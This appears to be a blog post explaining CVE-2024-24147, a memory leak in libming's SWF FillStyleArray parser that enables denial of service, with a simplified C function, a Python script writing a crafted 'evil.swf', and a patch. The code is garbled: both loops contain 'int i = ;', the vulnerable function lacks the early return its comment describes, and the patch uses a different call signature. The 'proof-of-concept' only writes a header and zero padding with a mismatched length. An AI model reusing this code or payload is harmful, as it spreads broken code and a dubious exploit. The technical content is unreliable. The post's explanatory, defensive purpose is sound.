---
Overview
A recent security flaw, CVE-2024-24147, has been identified in libming v.4.8—a widely used C library for parsing and creating Macromedia Flash (SWF) files. This vulnerability is caused by a memory leak issue within the function parseSWF_FILLSTYLEARRAY. By supplying a maliciously crafted SWF file, attackers can exploit this bug to trigger a Denial of Service (DoS), potentially affecting any software using libming to process SWF files, including websites and backend image processors.
This long-read post discusses how the bug occurs, provides an example code snippet, and explains its exploitation. You'll also find references to original reports, so you can dig deeper if needed.
What is libming and SWF?
- libming: An open-source C library for handling SWF (Shockwave Flash) files. Commonly used in media converters and older web services.
Where is the Issue?
This issue lives in the function parseSWF_FILLSTYLEARRAY, found in parse.c. The function parses "FillStyleArray" structures during SWF file processing. If a crafted file tricks the library, a memory leak occurs: memory that gets allocated is never freed.
What Can Go Wrong?
When parsing a specially crafted SWF file, the function leaks memory with every call. If an attacker supplies many such files or a loop triggers repeated parsing (e.g., in a server handling uploads/conversions), the system's memory gets eaten up—leading to a Denial of Service.
Here's a simplified snippet inspired by the vulnerable function (cleaned up for clarity)
// parse.c from libming (simplified)
SWFFillStyle* parseSWF_FILLSTYLEARRAY(SWFParser* p) {
int count = readUI8(p);
SWFFillStyle *fillStyles = calloc(count, sizeof(SWFFillStyle));
if (fillStyles == NULL) return NULL;
for (int i = ; i < count; i++) {
fillStyles[i] = parseSWF_FILLSTYLE(p);
// Bug: if parsing fails here, early return, fillStyles not freed -> memory leak!
}
return fillStyles;
}
Vulnerable Path
If parseSWF_FILLSTYLE() fails (for example, due to a bad/crafted file), the function may return early before freeing already-allocated memory. Attackers send many such files — the system eventually runs out of memory and crashes.
Proof-of-Concept Exploit
An attacker can create a malicious SWF file with a corrupted FillStyleArray. When libming tries to parse it, the memory leak occurs. Repeated uploads or requests can crash the service.
Example Python (trojan SWF payload)
# This script creates a minimal SWF file with a malformed FillStyleArray.
with open("evil.swf", "wb") as f:
f.write(b"FWS") # SWF file header
f.write(b"\x09") # SWF version 9
f.write(b"\x18\x00\x00\x00") # File length: minimal value
f.write(b"\x00" * 100) # Faked FillStyleArray with unexpected data
If this file is submitted to a libming-based tool or service, memory will be leaked.
Real-World Impact
- Websites or apps processing user-uploaded SWF files (e.g., old CMSs, animation tools, converters) are at risk.
Attackers can crash services without authentication just by submitting crafted files.
- Memory leaks, unlike buffer overflows, are often missed but can be devastating with automated attacks.
Example patch
for (int i = ; i < count; i++) {
if (!parseSWF_FILLSTYLE(p, &fillStyles[i])) {
// Free what was allocated so far
free(fillStyles);
return NULL;
}
}
References
- CVE-2024-24147 entry at MITRE
- libming project on GitHub
- Original Bug Report on GitHub
Final Thoughts
While memory leaks may seem minor compared to remote code execution, they can be devastating in repeated or automated scenarios—such as bots uploading files to web services. If you use libming, check your stack ASAP and update when a patch is available. Don’t underestimate how a small memory bug can bring down your whole application!
*Stay secure, keep dependencies up-to-date, and always validate user uploads—especially legacy formats like Flash SWF!*
Timeline
Published on: 02/29/2024 01:44:11 UTC
Last modified on: 03/12/2024 14:57:28 UTC